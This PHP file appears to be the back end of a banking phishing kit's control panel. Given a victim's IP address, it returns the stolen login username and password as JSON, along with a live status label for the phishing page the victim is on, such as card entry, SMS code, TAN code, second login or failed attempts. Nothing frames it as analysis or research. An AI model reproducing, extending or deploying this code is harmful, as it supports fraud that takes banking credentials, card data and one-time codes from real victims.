<?php
require_once 'db_config.php'; // Adjust the path as necessary

$userId = isset($_GET['userId']) ? $_GET['userId'] : die("User ID not provided");

// Prepare the SQL statement
$stmt = $conn->prepare("SELECT login_username, password, location FROM main WHERE ip_address =?");
if ($stmt === false) {
    die("Error preparing statement: " . $conn->error);
}

// Bind the parameter and execute the statement
$stmt->bind_param("s", $userId); // "s" indicates the variable type => "s" for string
if (!$stmt->execute()) {
    die("Error executing statement: " . $stmt->error);
}

// Bind the result to variables
$stmt->bind_result($loginUsername, $password, $locationFileName);
if ($stmt->fetch()) {
    // Translate the location file name to user-friendly text
    $locationText = ''; // Initialize $locationText
    switch ($locationFileName) {
        case 'activation.txt':
            $locationText = 'Activation Letter';
            break;
        case 'afk.txt':
            $locationText = 'AFK';
            break;
        case 'app.txt':
            $locationText = 'App';
            break;
        case 'cc_bad.txt':
            $locationText = 'Bad CC';
            break;
        case 'cc.txt':
            $locationText = 'CC Inputting..';
            break;
        case 'email_bad.txt':
            $locationText = 'Email Failed';
            break;
        case 'email.txt':
            $locationText = 'Email Login';
            break;
        case 'email_success.txt':
            $locationText = 'Email Success';
            break;
        case 'custom_page.txt':
            $locationText = 'Custom';
            break;
        case 'details_bad.txt':
            $locationText = 'Bad Details';
            break;
        case 'details.txt':
            $locationText = 'Details Inputting..';
            break;
        case 'login_bad.txt':
            $locationText = 'Bad Login';
            break;
        case 'login_pass.txt':
            $locationText = 'Second Login';
            break;
        case 'login.txt':
            $locationText = 'Loggin in..';
            break;
        case 'phone_bad.txt':
            $locationText = 'Bad Phone';
            break;
        case 'phone.txt':
            $locationText = 'Phone Inputting..';
            break;
        case 'sms_bad.txt':
            $locationText = 'Bad SMS';
            break;
        case 'sms.txt':
            $locationText = 'SMS Inputting..';
            break;
        case 'success.txt':
            $locationText = 'Successful';
            break;
        case 'success_trn.txt':
            $locationText = 'Successful Custom';
            break;
        case 'transaction.txt':
            $locationText = 'Custom TRN';
            break;
        case 'upload_bad.txt':
            $locationText = 'Bad Upload';
            break;
        case 'upload.txt':
            $locationText = 'Uploading..';
            break;
        case 'waiting.txt':
            $locationText = 'Waiting..';
            break;
        case 'waiting_afk.txt':
            $locationText = 'AFK Waiting..';
            break;
        case 'cancellation.txt':
            $locationText = 'Cancellation Limit';
            break;
        case 'tan.txt':
            $locationText = 'TAN';
            break;
        case 'tan_bad.txt':
            $locationText = 'TAN Failed';
            break;
        case 'startan.txt':
            $locationText = 'TAN..';
            break;
        case 'startan_bad.txt':
            $locationText = 'TAN Failed..';
            break;
        default:
            $locationText = 'Unknown (define the $locationText case name for the new template in admin.php';
    }

    // Prepare the response
    $response = array(
        'loginUsername' => $loginUsername,
        'password' => $password,
        'locationText' => $locationText
    );

    // Set the content type to application/json
    header('Content-Type: application/json');
    echo json_encode($response);
} else {
    echo json_encode(array('error' => 'Location not found'));
}

// Close the statement
$stmt->close();

// Close the connection
$conn->close();